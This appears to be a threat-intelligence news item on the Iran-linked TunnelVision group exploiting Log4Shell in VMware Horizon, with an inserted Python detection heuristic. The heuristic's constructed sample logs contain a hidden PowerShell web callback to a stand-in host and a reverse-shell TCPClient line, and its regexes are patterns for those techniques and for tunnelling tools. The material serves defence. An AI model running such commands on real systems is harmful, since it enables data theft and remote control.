The TunnelVision APT group is exploiting the Log4j vulnerability to deploy ransomware. The group is suspected to be linked with Iran and is targeting unpatched VMware Horizon servers.

About the attacks

Researchers from SentinelOne have tracked the activities of the APT group that is largely abusing one-day vulnerabilities in its latest campaigns.
  • The group was observed abusing the Log4Shell flaw in VMware Horizon to execute PowerShell commands, sending outputs back using a webhook.
  • These PowerShell commands further download tools such as Ngrok. Additionally, they spawn reverse shells and drop a PowerShell backdoor used to collect credentials and perform lateral movement.
  • The group exploited multiple one-day flaws, such as FortiOS (CVE-2018-13379) and Exchange (ProxyShell).
  • In most attacks, the group deployed a Fast Reverse Proxy Client (FRPC) and Plink tools.
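A defender-side illustration of the chain described in the bullets above, added here as an example and not taken from the SentinelOne report or the article: a small Python heuristic that flags process-creation records matching the reported TTPs (PowerShell spawned by the Horizon Tomcat service, PowerShell web callbacks, a reverse-shell primitive, and Ngrok/FRPC/Plink binaries). The log records, paths and hostnames are constructed, and the Horizon Tomcat parent-process name is an assumption.

```python
import re

# Constructed process-creation records (Sysmon Event ID 1 style, simplified):
# parent image, child image and child command line. Paths and hostnames are made up;
# the Horizon Tomcat service as the parent is an assumption, not from the article.
SAMPLE_EVENTS = [
    {"parent": r"C:\Program Files\VMware\VMware View\Server\bin\ws_TomcatService.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -nop -w hidden Invoke-WebRequest -Uri http://hook.invalid/out -Method Post -Body $o"},
    {"parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Users\Public\ngrok.exe",
     "cmdline": "ngrok tcp 3389"},
    {"parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell $c = New-Object System.Net.Sockets.TCPClient('c2.invalid', 4444)"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell Get-ChildItem C:\\Temp"},
]

# Regexes derived from the reported TTPs. All matching is done on lowercased text.
WEB_CALLBACK = re.compile(r"invoke-webrequest|invoke-restmethod|downloadstring|downloadfile|net\.webclient")
REVERSE_SHELL = re.compile(r"net\.sockets\.tcpclient")
TUNNEL_TOOL = re.compile(r"\\(ngrok|frpc|plink)\.exe$")

def classify(event):
    """Return the list of rule names that fire for one process-creation record."""
    parent = event["parent"].lower()
    image = event["image"].lower()
    cmd = event["cmdline"].lower()
    is_ps = image.endswith("powershell.exe")
    hits = []
    # Horizon's Java/Tomcat service should never spawn PowerShell (assumed parent name).
    if "tomcat" in parent and is_ps:
        hits.append("powershell_from_horizon_tomcat")
    # PowerShell posting output to a webhook or pulling additional tooling.
    if is_ps and WEB_CALLBACK.search(cmd):
        hits.append("powershell_web_callback")
    # Classic PowerShell reverse-shell primitive.
    if is_ps and REVERSE_SHELL.search(cmd):
        hits.append("powershell_reverse_shell")
    # Tunnelling / proxy utilities the group relied on.
    if TUNNEL_TOOL.search(image):
        hits.append("tunneling_tool")
    return hits

def scan(events):
    """Map record index -> fired rules, keeping only records that triggered something."""
    return {i: hits for i, e in enumerate(events) if (hits := classify(e))}
```

Running `scan(SAMPLE_EVENTS)` flags the first three constructed records and leaves the benign explorer-spawned PowerShell untouched.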

The APT35 connection

The TTPs of TunnelVision overlap with Iran-linked nation-state actor APT35, also known as Phosphorus, Nemesis Kitten, and Charming Kitten. 
  • According to researchers, the backdoor drops an executable that has an obfuscated version of a reverse shell similar to the PowerLess backdoor used by APT35 (believed to be linked with Iran) in a recent wave of attacks.
  • The researchers claim that the APT35 group has used a GitHub repository ‘VmWareHorizon’ linked with an account named ‘protections20,’ which is managed by a nation-state actor.

Ending notes

The TunnelVision APT group is active, is exploiting a range of flaws, and is tracked by other vendors under multiple names. Organizations are advised to share threat intelligence and make use of the provided IOCs. Moreover, always ensure that the software and operating systems in use are up to date with the latest patches.

Cyware Publisher